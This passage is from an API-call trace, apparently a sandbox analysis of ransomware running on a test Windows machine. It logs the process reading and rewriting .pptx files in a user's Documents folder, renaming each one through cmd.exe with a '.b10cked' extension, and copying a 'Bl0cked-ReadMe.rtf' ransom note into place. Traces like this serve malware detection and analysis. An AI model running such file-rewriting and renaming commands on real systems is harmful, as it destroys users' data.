dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.133] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.133] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.133] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x86ed [0234.133] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x8bd5 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x8bd5 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0234.134] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x45e9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x45e9, lpOverlapped=0x0) returned 1 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0234.134] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x45e9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x45e9, lpOverlapped=0x0) returned 1 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-17897, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x45ec [0234.134] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x45e9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x45e9, lpOverlapped=0x0) returned 1 [0234.135] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-17897, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x45ec [0234.135] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x45e9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x45e9, lpOverlapped=0x0) returned 1 [0234.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fUt5wrAPeTu.pptx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0234.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fUt5wrAPeTu.pptx", cchWideChar=16, lpMultiByteStr=0x1328744, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fUt5wrAPeTu.pptx", lpUsedDefaultChar=0x0) returned 16 [0234.139] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x8bd5 [0234.139] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0234.139] CloseHandle (hObject=0x1b4) returned 1 [0234.140] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fUt5wrAPeTu.pptx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT") returned 0x26 [0234.140] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0234.140] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xa64, dwThreadId=0xf08)) returned 1 [0234.146] CloseHandle (hObject=0x120) returned 1 [0234.146] CloseHandle (hObject=0x1b4) returned 1 [0234.146] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0234.146] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0234.146] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 1 [0234.146] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0234.146] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0234.146] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0234.146] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0234.146] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0234.146] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0234.146] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0234.146] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0234.146] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0234.146] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xb04, dwThreadId=0xb20)) returned 1 [0234.157] CloseHandle (hObject=0x120) returned 1 [0234.157] CloseHandle (hObject=0x1b4) returned 1 [0234.157] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0234.157] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0234.157] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0234.158] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0234.158] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.158] ReleaseMutex (hMutex=0xf8) returned 1 [0234.158] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.158] ReleaseMutex (hMutex=0xf8) returned 1 [0234.158] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.158] ReleaseMutex (hMutex=0xf8) returned 1 [0234.158] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.158] ReleaseMutex (hMutex=0xf8) returned 1 [0234.158] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\kC6z.pptx" (normalized: "c:\\users\\eebsym5\\documents\\kc6z.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0234.158] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.158] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.158] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.158] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29094761691) returned 1 [0234.158] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.158] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x2932 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x244a [0234.160] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2932 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2932 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0234.162] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0234.162] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1498, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1498, lpOverlapped=0x0) returned 1 [0234.162] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0234.162] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1498, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1498, lpOverlapped=0x0) returned 1 [0234.162] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-5272, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x149a [0234.162] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1498, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1498, lpOverlapped=0x0) returned 1 [0234.162] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-5272, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x149a [0234.162] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1498, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1498, lpOverlapped=0x0) returned 1 [0234.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kC6z.pptx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0234.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kC6z.pptx", cchWideChar=9, lpMultiByteStr=0x13131ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kC6z.pptx", lpUsedDefaultChar=0x0) returned 9 [0234.202] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2932 [0234.203] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0234.203] CloseHandle (hObject=0x1b4) returned 1 [0234.203] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\kC6z.pptx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT") returned 0x24 [0234.204] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0234.204] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9b4, dwThreadId=0xd50)) returned 1 [0234.216] CloseHandle (hObject=0x120) returned 1 [0234.216] CloseHandle 